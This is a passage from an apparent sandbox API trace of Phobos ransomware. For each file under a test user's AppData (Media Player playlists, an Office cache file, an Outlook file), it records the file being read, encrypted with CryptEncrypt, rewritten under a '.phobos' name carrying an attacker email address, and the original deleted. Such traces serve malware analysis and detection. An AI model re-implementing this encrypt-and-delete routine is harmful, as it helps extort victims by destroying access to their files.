out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x500) returned 1 [0187.048] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x500, lpOverlapped=0x0) returned 1 [0187.049] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0187.049] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0187.049] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0187.049] CryptDestroyKey (hKey=0xa32c28) returned 1 [0187.049] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0187.049] CryptDestroyKey (hKey=0xa32a68) returned 1 [0187.049] CloseHandle (hObject=0x178) returned 1 [0187.049] CloseHandle (hObject=0x12c) returned 1 [0187.049] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl")) returned 1 [0187.050] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0187.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0187.059] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1284) returned 1 [0187.059] CloseHandle (hObject=0x12c) returned 1 [0187.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl")) returned 0x2020 [0187.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0187.060] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0187.060] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0187.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0187.836] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0187.836] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0187.836] ReadFile (in: hFile=0x12c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x504, lpOverlapped=0x0) returned 1 [0188.270] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x510, dwBufLen=0x510 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x510) returned 1 [0188.270] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x510, lpOverlapped=0x0) returned 1 [0188.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0188.274] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.274] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0188.274] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.274] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0188.274] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.274] CloseHandle (hObject=0x12c) returned 1 [0188.274] CloseHandle (hObject=0x194) returned 1 [0188.275] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl")) returned 1 [0188.275] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0188.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.283] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=785) returned 1 [0188.283] CloseHandle (hObject=0x194) returned 1 [0188.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl")) returned 0x2020 [0188.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0188.283] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.283] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0188.283] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0188.284] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.284] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x311, lpOverlapped=0x0) returned 1 [0188.290] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x320, dwBufLen=0x320 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x320) returned 1 [0188.290] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x320, lpOverlapped=0x0) returned 1 [0188.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0188.291] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.291] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0188.291] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.291] WriteFile (in: hFile=0x12c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0188.291] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.291] CloseHandle (hObject=0x194) returned 1 [0188.291] CloseHandle (hObject=0x12c) returned 1 [0188.291] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl")) returned 1 [0188.292] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0188.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0188.301] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1025) returned 1 [0188.301] CloseHandle (hObject=0x180) returned 1 [0188.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl")) returned 0x2020 [0188.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.605] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.605] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.606] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a68) returned 1 [0188.606] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.606] ReadFile (in: hFile=0x134, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x401, lpOverlapped=0x0) returned 1 [0188.644] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410, dwBufLen=0x410 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410) returned 1 [0188.644] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x410, lpOverlapped=0x0) returned 1 [0188.645] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0188.645] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.645] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0188.645] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.645] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0188.645] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.645] CloseHandle (hObject=0x134) returned 1 [0188.646] CloseHandle (hObject=0x178) returned 1 [0188.646] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl")) returned 1 [0188.647] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0188.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0188.652] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=131072) returned 1 [0188.652] CloseHandle (hObject=0x164) returned 1 [0188.652] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd")) returned 0x2020 [0188.652] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0188.652] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.652] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0188.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0188.672] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a68) returned 1 [0188.672] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.672] ReadFile (in: hFile=0x164, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x20000, lpOverlapped=0x0) returned 1 [0188.712] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20010, dwBufLen=0x20010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20010) returned 1 [0188.713] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20010, lpOverlapped=0x0) returned 1 [0188.717] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0188.717] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0188.718] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80, dwBufLen=0x80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80) returned 1 [0188.718] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.718] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x132, lpOverlapped=0x0) returned 1 [0188.718] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.718] CloseHandle (hObject=0x164) returned 1 [0188.718] CloseHandle (hObject=0x180) returned 1 [0188.718] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd")) returned 1 [0188.720] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0188.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0188.786] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=185) returned 1 [0188.786] CloseHandle (hObject=0xb8) returned 1 [0188.786] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi")) returned 0x2020 [0188.786] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 